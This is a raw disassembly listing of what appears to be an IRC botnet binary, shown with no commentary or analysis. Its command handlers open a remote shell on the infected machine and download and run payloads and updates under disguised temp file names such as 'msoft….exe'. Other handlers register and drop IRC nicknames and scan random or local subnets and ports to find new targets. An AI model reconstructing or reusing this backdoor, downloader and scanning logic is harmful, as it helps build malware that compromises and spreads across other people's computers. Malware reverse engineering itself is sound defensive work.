lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
loc_407464: ; CODE XREF: sub_403B2C+3819�j
; sub_403B2C+3824�j
push dword ptr [esi+4]
push offset aZqrvt0t6nmz_ ; "ZqrVt0t6nmZ."
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_407517
mov eax, [esi+0Ch]
test eax, eax
jz loc_407517
push eax
lea eax, [ebp+var_40DC]
push offset aS_1 ; "%s"
push eax
call sub_422063
add esp, 0Ch
push 4
pop eax
cmp [ebp+arg_4], eax
mov [ebp+arg_C], eax
jle short loc_4074E8
loc_4074A6: ; CODE XREF: sub_403B2C+39BA�j
mov eax, [ebp+arg_C]
mov eax, [esi+eax*4]
test eax, eax
jz short loc_4074DD
push eax
lea eax, [ebp+var_6CAC]
push offset aS_0 ; " %s"
push eax
call sub_422063
lea eax, [ebp+var_6CAC]
push 100h
push eax
lea eax, [ebp+var_40DC]
push eax
call sub_421F40
add esp, 18h
loc_4074DD: ; CODE XREF: sub_403B2C+3982�j
inc [ebp+arg_C]
mov eax, [ebp+arg_C]
cmp eax, [ebp+arg_4]
jl short loc_4074A6
loc_4074E8: ; CODE XREF: sub_403B2C+3978�j
lea eax, [ebp+var_40DC]
push eax
lea eax, [ebp+var_3150]
push dword ptr [esi+8]
push offset dword_43C078
push offset aSMemoservSendS ; "%s memoserv :send %s %s"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 18h
loc_407517: ; CODE XREF: sub_403B2C+3949�j
; sub_403B2C+3954�j
push dword ptr [esi+4]
push offset a1shta0bzfwk1 ; "1ShtA0bzFwk1"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_407580
call dword_42F164 ; GetTickCount
push eax
call sub_4220EF
pop ecx
call sub_4010E7
push eax
call sub_4010E7
push eax
lea eax, [ebp+var_17CAC]
push offset aS@S_com ; "%s@%s.com"
push eax
call sub_422063
lea eax, [ebp+var_17CAC]
push eax
push offset dword_43C078
lea eax, [ebp+var_3150]
push offset aSNickservRegis ; "%s nickserv :register pass103 %s"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 24h
loc_407580: ; CODE XREF: sub_403B2C+39FC�j
push dword ptr [esi+4]
push offset aAzcsp_hkilo_ ; "AZcsP.hkiLO."
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_4075B8
push offset dword_43C078
lea eax, [ebp+var_3150]
push offset aSNickservDrop ; "%s nickserv drop"
push eax
call sub_422063
lea eax, [ebp+var_3150]
push eax
call sub_4032AA
add esp, 10h
loc_4075B8: ; CODE XREF: sub_403B2C+3A65�j
push dword ptr [esi+4]
push offset aErwc30qfw_p0 ; "eRWc30Qfw.P0"
call ebx ; dword_42F070
test eax, eax
jnz loc_40AF54
call sub_403A30
xor ebx, ebx
mov esi, offset aSUnloaded_ ; "%s Unloaded."
cmp [ebp+arg_14], ebx
jnz short loc_4075F8
cmp [ebp+arg_18], ebx
jnz loc_40680B
push offset aZrbax_zpsbs_ty ; "ZRbAx.zPSBs.TY84s/myQpz0"
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
loc_4075F8: ; CODE XREF: sub_403B2C+3AAD�j
cmp [ebp+arg_18], ebx
jmp loc_406805
; ---------------------------------------------------------------------------
loc_407600: ; CODE XREF: sub_403B2C+23AB�j
push dword ptr [esi]
push offset aFepmfZswfd ; "FEpMF/ZswFD/"
call ebx ; dword_42F070
test eax, eax
jnz loc_4076BB
cmp [esi+4], eax
jnz short loc_407620
mov ebx, offset aH08_Drzwx_ ; "h/08./drzWX."
jmp loc_409FCE
; ---------------------------------------------------------------------------
loc_407620: ; CODE XREF: sub_403B2C+3AE8�j
push 20h
push [ebp+arg_8]
call sub_4233B0
mov esi, eax
xor ebx, ebx
pop ecx
cmp esi, ebx
pop ecx
jz loc_40AF54
cmp [ebp+arg_30], ebx
jz short loc_40766E
mov al, [ebp+arg_34]
mov byte ptr [ebp+arg_C+3], 5Fh
test al, al
jz short loc_40764B
mov byte ptr [ebp+arg_C+3], al
loc_40764B: ; CODE XREF: sub_403B2C+3B1A�j
push esi
call sub_422120
test eax, eax
pop ecx
jbe short loc_40766E
loc_407656: ; CODE XREF: sub_403B2C+3B40�j
mov al, byte ptr [ebp+arg_C+3]
cmp [ebx+esi], al
jnz short loc_407662
mov byte ptr [ebx+esi], 20h
loc_407662: ; CODE XREF: sub_403B2C+3B30�j
push esi
inc ebx
call sub_422120
cmp ebx, eax
pop ecx
jb short loc_407656
loc_40766E: ; CODE XREF: sub_403B2C+3B0F�j
; sub_403B2C+3B28�j
inc esi
push esi
call sub_423517
test eax, eax
pop ecx
jz short loc_407696
cmp [ebp+arg_18], 0
push offset aH08_Drzwx_ ; "h/08./drzWX."
push offset aSSystemcallFai ; "%s SystemCall failed."
jnz loc_40ADA1
loc_40768E: ; CODE XREF: sub_403B2C+966�j
push dword ptr [edi+0Ch]
jmp loc_404007
; ---------------------------------------------------------------------------
loc_407696: ; CODE XREF: sub_403B2C+3B4C�j
cmp [ebp+arg_18], 0
push esi
push offset aH08_Drzwx_ ; "h/08./drzWX."
push offset aSSystemcallSen ; "%s SystemCall sent: \"%s\""
jnz loc_40A5C3
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
jmp loc_40A5CD
; ---------------------------------------------------------------------------
loc_4076BB: ; CODE XREF: sub_403B2C+3ADF�j
push dword ptr [esi]
push offset aSud8hRsu8j1 ; "sUd8h/rsu8j1"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_4077D1
mov eax, [ebp+arg_14]
mov ecx, [ebp+arg_18]
mov [ebp+var_1D6C], eax
mov eax, [ebp+arg_10]
mov [ebp+var_1D70], ecx
mov [ebp+var_1E7C], eax
mov eax, [eax]
mov [ebp+var_1E78], eax
lea eax, [ebp+var_1DF4]
test ecx, ecx
jnz short loc_407703
push dword ptr [edi+0Ch]
jmp short loc_407705
; ---------------------------------------------------------------------------
loc_407703: ; CODE XREF: sub_403B2C+3BD0�j
push dword ptr [edi]
loc_407705: ; CODE XREF: sub_403B2C+3BD5�j
push eax
call dword_42F04C ; lstrcpyA
push 0Ah
call sub_41C235
test eax, eax
pop ecx
jle short loc_40774B
mov esi, offset aSRemoteShellRu ; "%s Remote shell running."
loc_40771D: ; CODE XREF: sub_403B2C+3CC7�j
mov ebx, offset aCkdai0gd9lr_ ; "ckdai0Gd9lr."
loc_407722: ; CODE XREF: sub_403B2C+698�j
; sub_403B2C+975�j ...
cmp [ebp+arg_14], 0
jnz short loc_407742
cmp [ebp+arg_18], 0
loc_40772C: ; CODE XREF: sub_403B2C+64B3�j
; sub_403B2C+723F�j
jnz loc_40AD9F
loc_407732: ; CODE XREF: sub_403B2C+291�j
; sub_403B2C+418C�j ...
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
loc_407742: ; CODE XREF: sub_403B2C+279�j
; sub_403B2C+3BFA�j ...
cmp [ebp+arg_18], 0
jmp loc_40AD99
; ---------------------------------------------------------------------------
loc_40774B: ; CODE XREF: sub_403B2C+3BEA�j
push [ebp+var_1E7C]
lea eax, [ebp+var_1DF4]
push eax
call sub_414508
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov ebx, offset aCkdai0gd9lr_ ; "ckdai0Gd9lr."
mov esi, offset aSCouldnTOpenSh ; "%s Couldn't open shell."
jnz short loc_40778A
cmp [ebp+arg_14], 0
jnz short loc_40778A
cmp [ebp+arg_18], 0
jnz short loc_407790
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
loc_40778A: ; CODE XREF: sub_403B2C+3C40�j
; sub_403B2C+3C46�j
cmp [ebp+arg_18], 0
jz short loc_40779E
loc_407790: ; CODE XREF: sub_403B2C+3C4C�j
push ebx
push esi
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
jmp short loc_4077B9
; ---------------------------------------------------------------------------
loc_40779E: ; CODE XREF: sub_403B2C+3C62�j
cmp [ebp+arg_14], 0
jnz loc_40AF54
push ebx
push offset aSShellReady_ ; "%s Shell ready."
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
loc_4077B9: ; CODE XREF: sub_403B2C+3C70�j
add esp, 10h
cmp [ebp+arg_18], 0
jz loc_40AF54
push ebx
push offset aSShellReady_ ; "%s Shell ready."
jmp loc_40ADA1
; ---------------------------------------------------------------------------
loc_4077D1: ; CODE XREF: sub_403B2C+3B9F�j
push dword ptr [esi]
push offset aJ2yyw_j09xc ; "j2yYw.J09XC/"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz loc_4078BF
mov eax, [esi+4]
test eax, eax
jnz short loc_4077F8
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
jmp loc_40771D
; ---------------------------------------------------------------------------
loc_4077F8: ; CODE XREF: sub_403B2C+3CC0�j
push eax
lea eax, [ebp+var_3254]
push offset aS_1 ; "%s"
push eax
call sub_422063
add esp, 0Ch
push 2
pop ebx
cmp [ebp+arg_4], ebx
jle short loc_40784F
loc_407815: ; CODE XREF: sub_403B2C+3D21�j
mov eax, [esi+ebx*4]
test eax, eax
jz short loc_407849
push eax
lea eax, [ebp+var_19CAC]
push offset aS_0 ; " %s"
push eax
call sub_422063
lea eax, [ebp+var_19CAC]
push 104h
push eax
lea eax, [ebp+var_3254]
push eax
call sub_421F40
add esp, 18h
loc_407849: ; CODE XREF: sub_403B2C+3CEE�j
inc ebx
cmp ebx, [ebp+arg_4]
jl short loc_407815
loc_40784F: ; CODE XREF: sub_403B2C+3CE7�j
lea eax, [ebp+var_3254]
push offset asc_433F80 ; "\n"
push eax
call sub_423270
lea eax, [ebp+var_3254]
push eax
call sub_414311
add esp, 0Ch
mov ebx, offset aCkdai0gd9lr_ ; "ckdai0Gd9lr."
test eax, eax
jnz short loc_407882
mov esi, offset aSErrorSendingT ; "%s Error sending to shell."
jmp loc_407722
; ---------------------------------------------------------------------------
loc_407882: ; CODE XREF: sub_403B2C+3D4A�j
cmp [ebp+arg_14], 0
mov esi, offset aSCommandsS_ ; "%s Commands: %s."
jnz short loc_4078AA
cmp [ebp+arg_18], 0
jnz short loc_4078B4
lea eax, [ebp+var_3254]
push eax
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 14h
loc_4078AA: ; CODE XREF: sub_403B2C+3D5F�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_4078B4: ; CODE XREF: sub_403B2C+3D65�j
lea eax, [ebp+var_3254]
jmp loc_4041AF
; ---------------------------------------------------------------------------
loc_4078BF: ; CODE XREF: sub_403B2C+3CB5�j
push dword ptr [esi]
push offset a43ucs0rkqux_ ; "43uCS0rkQUx."
call ebx ; dword_42F070
test eax, eax
jnz short loc_4078D8
push offset off_435C10
push 0Ah
jmp loc_409B7C
; ---------------------------------------------------------------------------
loc_4078D8: ; CODE XREF: sub_403B2C+3D9E�j
push dword ptr [esi]
push offset aUfbss0cbo8c_ ; "uFbSS0Cbo8C."
call ebx ; dword_42F070
test eax, eax
jnz loc_407A7F
cmp [esi+4], eax
jz loc_407A70
cmp [esi+8], eax
jz loc_407A70
push 0Ch
call sub_41C254
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_407948
cmp [ebp+arg_14], 0
mov esi, offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
mov ebx, offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
jnz short loc_407936
cmp [ebp+arg_18], 0
jnz short loc_407940
push eax
push offset aDownload ; "Download"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_407936: ; CODE XREF: sub_403B2C+3DEC�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_407940: ; CODE XREF: sub_403B2C+3DF2�j
push [ebp+arg_C]
jmp loc_407A4B
; ---------------------------------------------------------------------------
loc_407948: ; CODE XREF: sub_403B2C+3DDC�j
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_20]
mov [ebp+var_2150], eax
mov eax, [ebp+arg_14]
mov [ebp+var_209C], eax
mov eax, [ebp+arg_18]
mov [ebp+var_2098], eax
mov [ebp+var_20A0], ecx
test eax, eax
lea eax, [ebp+var_214C]
jnz short loc_40797B
push dword ptr [edi+0Ch]
jmp short loc_40797D
; ---------------------------------------------------------------------------
loc_40797B: ; CODE XREF: sub_403B2C+3E48�j
push dword ptr [edi]
loc_40797D: ; CODE XREF: sub_403B2C+3E4D�j
push eax
call dword_42F04C ; lstrcpyA
mov eax, [esi+4]
xor ecx, ecx
mov [ebp+var_20C8], eax
mov eax, [esi+8]
mov [ebp+var_20C4], eax
xor eax, eax
mov [ebp+var_20BC], eax
cmp [esi+0Ch], eax
mov ebx, offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
setnz cl
mov [ebp+var_20B8], ecx
xor ecx, ecx
cmp [esi+10h], eax
setnz cl
mov [ebp+var_20B4], ecx
push dword ptr [esi+8]
mov eax, [esi+4]
push eax
push ebx
push offset aSDownloadingTo ; "%s Downloading to: %s."
push 0Ch
call sub_41BED7
add esp, 14h
mov [ebp+var_20CC], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_2150]
push esi
push eax
push offset sub_40CDE2
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_20CC]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jnz short loc_407A5D
cmp [ebp+arg_14], 0
mov esi, offset aSFailedToStart ; "%s Failed to start [%s], error: [%d]"
jnz short loc_407A3A
cmp [ebp+arg_18], 0
jnz short loc_407A44
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aDownload ; "Download"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_407A3A: ; CODE XREF: sub_403B2C+3EEA�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_407A44: ; CODE XREF: sub_403B2C+3EF0�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
loc_407A4B: ; CODE XREF: sub_403B2C+3E17�j
push offset aDownload ; "Download"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_407A55: ; CODE XREF: sub_403B2C+3F38�j
push 32h
call dword_42F15C ; Sleep
loc_407A5D: ; CODE XREF: sub_403B2C+3EDF�j
cmp [ebp+var_2094], 0
jz short loc_407A55
mov esi, offset aSDownload ; "%s Download"
jmp loc_407C9B
; ---------------------------------------------------------------------------
loc_407A70: ; CODE XREF: sub_403B2C+3DC0�j
; sub_403B2C+3DC9�j
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
mov ebx, offset aOpc9a1uprd41iw ; "OPC9A1upRd41IwhIm0ocHBf0"
jmp loc_407722
; ---------------------------------------------------------------------------
loc_407A7F: ; CODE XREF: sub_403B2C+3DB7�j
push dword ptr [esi]
push offset aNoazx1alvg0 ; "NoaZx1Alvg/0"
call ebx ; dword_42F070
test eax, eax
jnz loc_407CBD
xor ecx, ecx
cmp [esi+4], ecx
jnz short loc_407AA6
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
mov ebx, offset aSmo3c0mcu8j_xf ; "SmO3C0MCu8j.xfK1r.VuQwI."
jmp loc_40AD5F
; ---------------------------------------------------------------------------
loc_407AA6: ; CODE XREF: sub_403B2C+3F69�j
mov eax, [esi+8]
cmp eax, ecx
jz short loc_407ABD
push eax
push (offset loc_439027+1)
call ebx ; dword_42F070
test eax, eax
jz loc_40AF54
loc_407ABD: ; CODE XREF: sub_403B2C+3F7F�j
push 0Ch
call sub_41C254
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_407B0A
cmp [ebp+arg_14], 0
mov esi, offset aSSAlreadyRunni ; "%s %s Already running at thread number:"...
mov ebx, offset aSmo3c0mcu8j_xf ; "SmO3C0MCu8j.xfK1r.VuQwI."
jnz short loc_407AF8
cmp [ebp+arg_18], 0
jnz short loc_407B02
push eax
push offset aUpdate ; "Update"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_407AF8: ; CODE XREF: sub_403B2C+3FAE�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_407B02: ; CODE XREF: sub_403B2C+3FB4�j
push [ebp+arg_C]
jmp loc_407C7B
; ---------------------------------------------------------------------------
loc_407B0A: ; CODE XREF: sub_403B2C+3F9E�j
lea eax, [ebp+var_47EC]
push eax
push 104h
call dword_42F050 ; GetTempPathA
call sub_4220FC
push 9
pop ebx
cdq
mov ecx, ebx
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, ebx
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, ebx
idiv ecx
push edx
call sub_4220FC
cdq
mov ecx, ebx
idiv ecx
push edx
call sub_4220FC
cdq
idiv ebx
lea eax, [ebp+var_47EC]
push edx
push eax
lea eax, [ebp+var_3EDC]
push offset aSmsoftDDDDD_ex ; "%smsoft%d%d%d%d%d.exe"
push eax
call sub_422063
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_20]
mov [ebp+var_1D64], eax
mov eax, [ebp+arg_14]
mov [ebp+var_1CB0], eax
mov eax, [ebp+arg_18]
add esp, 20h
mov [ebp+var_1CAC], eax
test eax, eax
mov [ebp+var_1CB4], ecx
lea eax, [ebp+var_1D60]
jnz short loc_407BA2
push dword ptr [edi+0Ch]
jmp short loc_407BA4
; ---------------------------------------------------------------------------
loc_407BA2: ; CODE XREF: sub_403B2C+406F�j
push dword ptr [edi]
loc_407BA4: ; CODE XREF: sub_403B2C+4074�j
push eax
call dword_42F04C ; lstrcpyA
mov eax, [esi+4]
xor ecx, ecx
mov [ebp+var_1CDC], eax
lea eax, [ebp+var_3EDC]
mov [ebp+var_1CD8], eax
xor eax, eax
cmp [esi+0Ch], eax
mov [ebp+var_1CCC], eax
mov [ebp+var_1CC8], eax
mov [ebp+var_1CD0], 1
setnz cl
mov [ebp+var_1CC4], ecx
mov esi, [esi+4]
lea eax, [ebp+var_3EDC]
mov ebx, offset aSmo3c0mcu8j_xf ; "SmO3C0MCu8j.xfK1r.VuQwI."
push eax
push esi
push ebx
push offset aSDownloadingUp ; "%s Downloading update to: (%s)"
push 0Ch
call sub_41BED7
add esp, 14h
mov [ebp+var_1CE0], eax
lea eax, [ebp+arg_6C]
xor esi, esi
push eax
lea eax, [ebp+var_1D64]
push esi
push eax
push offset sub_40CDE2
push esi
push esi
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_1CE0]
imul ecx, 1018h
cmp eax, esi
mov dword_46D414[ecx], eax
jnz short loc_407C8D
cmp [ebp+arg_14], 0
mov esi, offset aSFailedToStart ; "%s Failed to start [%s], error: [%d]"
jnz short loc_407C6A
cmp [ebp+arg_18], 0
jnz short loc_407C74
call dword_42F068 ; RtlGetLastWin32Error
push eax
push offset aUpdate ; "Update"
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 18h
loc_407C6A: ; CODE XREF: sub_403B2C+411A�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_407C74: ; CODE XREF: sub_403B2C+4120�j
call dword_42F068 ; RtlGetLastWin32Error
push eax
loc_407C7B: ; CODE XREF: sub_403B2C+3FD9�j
push offset aUpdate ; "Update"
jmp loc_40AF45
; ---------------------------------------------------------------------------
loc_407C85: ; CODE XREF: sub_403B2C+4168�j
push 32h
call dword_42F15C ; Sleep
loc_407C8D: ; CODE XREF: sub_403B2C+410F�j
cmp [ebp+var_1CA8], 0
jz short loc_407C85
mov esi, offset aSDownloading_0 ; "%s Downloading update"
loc_407C9B: ; CODE XREF: sub_403B2C+3F3F�j
xor eax, eax
cmp [ebp+arg_14], eax
jnz loc_407742
cmp [ebp+arg_18], eax
jnz loc_40AD9F
cmp [ebp+arg_20], eax
jz loc_40AF54
jmp loc_407732
; ---------------------------------------------------------------------------
loc_407CBD: ; CODE XREF: sub_403B2C+3F5E�j
push dword ptr [esi]
push offset aL80reUvcue1 ; "l80re/UvCUe1"
call ebx ; dword_42F070
test eax, eax
jnz short loc_407D11
cmp [ebp+arg_18], eax
mov esi, [esi+4]
jnz short loc_407CEC
test esi, esi
jz short loc_407CDF
push esi
call sub_422B5A
pop ecx
jmp short loc_407CE1
; ---------------------------------------------------------------------------
loc_407CDF: ; CODE XREF: sub_403B2C+41A8�j
xor eax, eax
loc_407CE1: ; CODE XREF: sub_403B2C+41B1�j
push eax
push [ebp+arg_20]
push 0
push dword ptr [edi+0Ch]
jmp short loc_407D04
; ---------------------------------------------------------------------------
loc_407CEC: ; CODE XREF: sub_403B2C+41A4�j
test esi, esi
jz short loc_407CF9
push esi
call sub_422B5A
pop ecx
jmp short loc_407CFB
; ---------------------------------------------------------------------------
loc_407CF9: ; CODE XREF: sub_403B2C+41C2�j
xor eax, eax
loc_407CFB: ; CODE XREF: sub_403B2C+41CB�j
push eax
push [ebp+arg_20]
push [ebp+arg_18]
push dword ptr [edi]
loc_407D04: ; CODE XREF: sub_403B2C+41BE�j
push [ebp+arg_10]
call start
jmp loc_40A5CD
; ---------------------------------------------------------------------------
loc_407D11: ; CODE XREF: sub_403B2C+419C�j
push dword ptr [esi]
push offset aTvjro1ubgtg1 ; "TVJrO1uBGtg1"
call ebx ; dword_42F070
test eax, eax
jnz short loc_407D5D
mov esi, [esi+4]
test esi, esi
jz short loc_407D2D
push esi
call sub_422B5A
jmp short loc_407D34
; ---------------------------------------------------------------------------
loc_407D2D: ; CODE XREF: sub_403B2C+41F7�j
push 8
call sub_41C254
loc_407D34: ; CODE XREF: sub_403B2C+41FF�j
test eax, eax
pop ecx
jz loc_40AF54
cmp [ebp+arg_18], 0
push eax
jnz short loc_407D4B
push 0
push dword ptr [edi+0Ch]
jmp short loc_407D50
; ---------------------------------------------------------------------------
loc_407D4B: ; CODE XREF: sub_403B2C+4216�j
push [ebp+arg_18]
push dword ptr [edi]
loc_407D50: ; CODE XREF: sub_403B2C+421D�j
push [ebp+arg_10]
call sub_401408
jmp loc_40ADAB
; ---------------------------------------------------------------------------
loc_407D5D: ; CODE XREF: sub_403B2C+41F0�j
push dword ptr [esi]
push offset aVxa_uCdd7s0 ; "VXA.u/cDD7S0"
call ebx ; dword_42F070
test eax, eax
jnz short loc_407D76
push offset aStopped_ ; "Stopped."
push 8
jmp loc_409B7C
; ---------------------------------------------------------------------------
loc_407D76: ; CODE XREF: sub_403B2C+423C�j
push dword ptr [esi]
push offset aH1cmq0wqw5c_ ; "h1cMQ0wQw5C."
call ebx ; dword_42F070
test eax, eax
jnz loc_4082A8
cmp [esi+4], eax
jz loc_40AD70
cmp [esi+8], eax
jz loc_40AD70
cmp [esi+0Ch], eax
jz loc_40AD70
cmp [esi+10h], eax
jz loc_40AD70
push 8
call sub_41C235
push dword ptr [esi+8]
mov [ebp+arg_C], eax
call sub_422B5A
add eax, [ebp+arg_C]
pop ecx
pop ecx
cmp eax, 0C9h
jg loc_40AF54
push dword ptr [esi+4]
call sub_422B5A
movzx eax, ax
mov [ebp+var_1A8], eax
push dword ptr [esi+8]
call sub_422B5A
mov [ebp+var_190], eax
push dword ptr [esi+0Ch]
call sub_422B5A
add esp, 0Ch
cmp eax, 1
mov [ebp+var_1A4], eax
jnb short loc_407E0B
xor eax, eax
inc eax
mov [ebp+var_1A4], eax
loc_407E0B: ; CODE XREF: sub_403B2C+42D4�j
push 6
pop ecx
cmp eax, ecx
jbe short loc_407E18
mov [ebp+var_1A4], ecx
loc_407E18: ; CODE XREF: sub_403B2C+42E4�j
push dword ptr [esi+10h]
call sub_422B5A
cmp eax, 270Fh
pop ecx
mov [ebp+var_1A0], eax
jbe short loc_407E38
mov [ebp+var_1A0], 270Fh
loc_407E38: ; CODE XREF: sub_403B2C+4300�j
or [ebp+var_18C], 0FFFFFFFFh
xor eax, eax
cmp dword_432088, eax
mov [ebp+arg_C], eax
jz short loc_407E8F
mov [ebp+arg_4], offset dword_432088
loc_407E53: ; CODE XREF: sub_403B2C+4344�j
mov eax, [ebp+arg_4]
push dword ptr [esi+4]
add eax, 0FFFFFFC8h
push eax
call ebx ; dword_42F070
test eax, eax
jz short loc_407E74
add [ebp+arg_4], 48h
inc [ebp+arg_C]
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_407E53
jmp short loc_407E8D
; ---------------------------------------------------------------------------
loc_407E74: ; CODE XREF: sub_403B2C+4335�j
mov eax, [ebp+arg_C]
mov [ebp+var_18C], eax
lea ecx, [eax+eax*8]
mov ecx, dword_432088[ecx*8]
mov [ebp+var_1A8], ecx
loc_407E8D: ; CODE XREF: sub_403B2C+4346�j
xor eax, eax
loc_407E8F: ; CODE XREF: sub_403B2C+431E�j
cmp [ebp+var_1A8], eax
jnz short loc_407EA6
mov ebx, offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
mov esi, offset aSInvalidPort ; "%s Invalid port"
jmp loc_40AD7A
; ---------------------------------------------------------------------------
loc_407EA6: ; CODE XREF: sub_403B2C+4369�j
mov ecx, [esi+14h]
cmp ecx, eax
jz loc_407F39
push ecx
push offset aX_x_x_x ; "x.x.x.x"
call sub_422760
pop ecx
test eax, eax
pop ecx
jnz short loc_407F0A
call dword_42F164 ; GetTickCount
push eax
call sub_4220EF
pop ecx
loc_407ECF: ; CODE XREF: sub_403B2C+43B6�j
call sub_4220FC
cdq
mov ecx, 0F0h
idiv ecx
add edx, 4
cmp edx, 7Fh
jz short loc_407ECF
push edx
push offset aD_x_x_x ; "%d.x.x.x"
lea eax, [ebp+var_238]
push 10h
push eax
call sub_42219B
add esp, 10h
loc_407EFB: ; CODE XREF: sub_403B2C+45C9�j
; sub_403B2C+45D1�j ...
mov [ebp+var_17C], 1
jmp loc_408014
; ---------------------------------------------------------------------------
loc_407F0A: ; CODE XREF: sub_403B2C+4394�j
push dword ptr [esi+14h]
lea eax, [ebp+var_238]
push 10h
push eax
call sub_42219B
push 78h
push dword ptr [esi+14h]
call sub_4233B0
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_17C], eax
jmp loc_408014
; ---------------------------------------------------------------------------
loc_407F39: ; CODE XREF: sub_403B2C+437F�j
cmp [ebp+arg_60], eax
jnz short loc_407F71
cmp [ebp+arg_50], eax
jnz loc_40805F
cmp [ebp+arg_54], eax
jnz loc_40805F
cmp [ebp+arg_58], eax
jnz loc_40805F
cmp [ebp+arg_5C], eax
jnz loc_40805F
mov ebx, offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
mov esi, offset aSNoIpSpecified ; "%s No IP specified."
jmp loc_40AD7A
; ---------------------------------------------------------------------------
loc_407F71: ; CODE XREF: sub_403B2C+4410�j
cmp [ebp+arg_50], eax
jz short loc_407F7F
mov [ebp+arg_C], 1
jmp short loc_407F9D
; ---------------------------------------------------------------------------
loc_407F7F: ; CODE XREF: sub_403B2C+4448�j
cmp [ebp+arg_54], eax
jz short loc_407F8D
mov [ebp+arg_C], 2
jmp short loc_407F9D
; ---------------------------------------------------------------------------
loc_407F8D: ; CODE XREF: sub_403B2C+4456�j
cmp [ebp+arg_58], eax
jz loc_408050
mov [ebp+arg_C], 3
loc_407F9D: ; CODE XREF: sub_403B2C+4451�j
; sub_403B2C+445F�j
mov esi, offset dword_4552D0
push offset byte_44D6A4
push esi
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_407FBE
push esi
call sub_414173
test eax, eax
pop ecx
jz short loc_407FE4
loc_407FBE: ; CODE XREF: sub_403B2C+4485�j
mov ecx, [ebp+arg_10]
call sub_41111B
mov ecx, [ebp+arg_10]
push eax
call sub_4105B8
mov ebx, eax
push 2710h
push ebx
call dword_42F064 ; WaitForSingleObject
push ebx
call dword_42F038 ; CloseHandle
loc_407FE4: ; CODE XREF: sub_403B2C+4490�j
push [ebp+arg_C]
mov ebx, [ebp+arg_5C]
push ebx
push esi
call sub_401311
add esp, 0Ch
test eax, eax
jz loc_40AF54
push 10h
push eax
lea eax, [ebp+var_238]
push eax
call sub_4222F0
add esp, 0Ch
loc_40800E: ; CODE XREF: sub_403B2C+4592�j
mov [ebp+var_17C], ebx
loc_408014: ; CODE XREF: sub_403B2C+43D9�j
; sub_403B2C+4408�j
mov eax, [ebp+arg_14]
mov ecx, [ebp+arg_10]
mov [ebp+var_188], eax
mov eax, [ebp+arg_20]
mov [ebp+var_180], eax
mov eax, [ebp+arg_18]
mov [ebp+var_184], eax
mov [ebp+var_170], ecx
test eax, eax
lea eax, [ebp+var_228]
jz loc_408124
push offset dword_439638
jmp loc_408129
; ---------------------------------------------------------------------------
loc_408050: ; CODE XREF: sub_403B2C+4464�j
mov ebx, offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
mov esi, offset aSNoSubnetClass ; "%s No subnet class specified."
jmp loc_40AD7A
; ---------------------------------------------------------------------------
loc_40805F: ; CODE XREF: sub_403B2C+4415�j
; sub_403B2C+441E�j ...
mov ecx, [ebp+arg_10]
push 10h
pop esi
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_3C]
push eax
mov [ebp+var_2C], esi
call sub_41112B
push eax
call dword_4542A8 ; getsockname
xor ebx, ebx
cmp [ebp+arg_50], ebx
jz short loc_40808C
and [ebp+var_38], 0FFh
jmp short loc_4080A1
; ---------------------------------------------------------------------------
loc_40808C: ; CODE XREF: sub_403B2C+4555�j
cmp [ebp+arg_54], ebx
jz short loc_408098
and word ptr [ebp+var_38+2], 0
jmp short loc_4080A1
; ---------------------------------------------------------------------------
